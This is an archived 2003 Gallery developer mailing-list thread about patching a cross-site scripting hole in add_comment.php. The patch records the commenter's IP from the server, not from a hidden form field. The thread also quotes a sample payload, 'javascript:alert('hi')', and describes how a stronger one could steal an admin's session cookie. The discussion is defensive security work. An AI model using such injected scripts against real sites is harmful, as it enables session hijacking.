From: Andrew L. <joy...@ya...> - 2003-01-29 12:43:55
|
Also, just wondering, are you going to ship 1.3.4 because of this or just wait until all the new features are stable (i.e. normal release cycle)? If you wanted, you could make this a patch release, considering the patch needed was 2 lines, unless there are other features that you would like in 1.3.4. --Andrew --- Andrew Lindeman <joy...@ya...> wrote: > Sounds good :) > > --Andrew > > --- Bharat Mediratta <bh...@me...> wrote: > > > > Ok, I had some spare time so I added this in > > 1.3.4-cvs-b10 > > along with some other stuff I've had kicking about > > in my > > dev tree for a little while. > > > > As a further measure, I also run removeTags() on > any > > IP addresses when they are displayed, so that > we'll > > be > > protected against malicious data that might have > > been > > entered with an older version of the code. > > > > -Bharat > > > > From: "Andrew Lindeman" <joy...@ya...> > > ... > > > Eeek. Glad I caught that. Thanks to Delfim for > > > realizing it was more than what I was > suggesting. > > > Here's my full patch (available here too: > > > > > > http://pictures.troop350.org/gallery/add_comment.txt > > > ). > > > > > > --Andrew > > > > > > --- add_comment.php.orig 2003-01-28 > > 21:27:14.000000000 > > > -0600 > > > +++ add_comment.php 2003-01-28 > 21:27:48.000000000 > > > -0600 > > > @@ -41,7 +41,7 @@ > > > if ($commenter_name && $comment_text) { > > > $comment_text = > > removeTags($comment_text); > > > $commenter_name = > > > removeTags($commenter_name); > > > - $gallery->album->addComment($index, > > > stripslashes($comment_text), $IPNumber, > > > $commenter_name); > > > + $gallery->album->addComment($index, > > > stripslashes($comment_text), > > > $HTTP_SERVER_VARS['REMOTE_ADDR'], > > $commenter_name); > > > $gallery->album->save(); > > > dismissAndReload(); > > > return; > > > @@ -74,7 +74,6 @@ > > > > > > <?php echo makeFormIntro("add_comment.php", > > > array("name" => "theform", "method" => "POST")); > > ?> > > > <input type=hidden name="index" value="<?php > echo > > > $index ?>"> > > > -<input type=hidden name="IPNumber" value="<?php > > echo > > > $HTTP_SERVER_VARS['REMOTE_ADDR'] ?>"> > > > <table border=0 cellpadding=5> > > > <tr> > > > <td>Name or email:</td> > > > > > > --- Bharat Mediratta <bh...@me...> wrote: > > > > > > > > From: "John Kirkland" <jp...@bl...> > > > > > > > > > When I wrote add_comment.php, I didn't have > > the > > > > removeTags call. Bharat > > > > > added that later as a security fix. > > > > > > > > > > I'm trying to get my arms around the XSS > thing > > so > > > > I can stop writing code > > > > > with the problem! Since javascript is > > > > client-executed, is that truly XSS? > > > > > I thought XSS was when you got the server to > > > > execute code. > > > > > > > > XSS occurs when you blindly take client side > > input > > > > and display > > > > it on the browser without filtering out > > potentially > > > > damaging > > > > Javascript commands. This particular XSS hole > > could > > > > be exploited > > > > by somebody submitting an add_comment post > with > > > > something like this > > > > in it: > > > > > > > > javascript:alert('hi') > > > > > > > > Then when the admin goes to view the comment, > > his > > > > browser will > > > > run the script. The above example will just > > print > > > > out a message, > > > > but a more sophisticated one could mail the > > admin's > > > > session cookie > > > > to a malicious user or do something worse. > This > > is > > > > bad. > > > > > > > > Beckett, can you move this patch to the top of > > the > > > > list? Once this > > > > is in we should cut a new rev of Gallery with > > this > > > > fix and ship it. > > > > > > > > Thanks, > > > > -Bharat > > > > > > > > > > > > > > __________________________________________________ > > > Do you Yahoo!? > > > Yahoo! Mail Plus - Powerful. Affordable. Sign up > > now. > > > http://mailplus.yahoo.com > > > > > > __________________________________________________ > Do you Yahoo!? > Yahoo! Mail Plus - Powerful. Affordable. Sign up > now. > http://mailplus.yahoo.com > > > ------------------------------------------------------- > This SF.NET email is sponsored by: > SourceForge Enterprise Edition + IBM + LinuxWorld = > Something 2 See! > http://www.vasoftware.com > __[ g a l l e r y - d e v e l > ]_________________________ > > [ list info/archive --> > http://gallery.sf.net/lists.php ] > [ gallery info/FAQ/download --> > http://gallery.sf.net ] __________________________________________________ Do you Yahoo!? Yahoo! Mail Plus - Powerful. Affordable. Sign up now. http://mailplus.yahoo.com |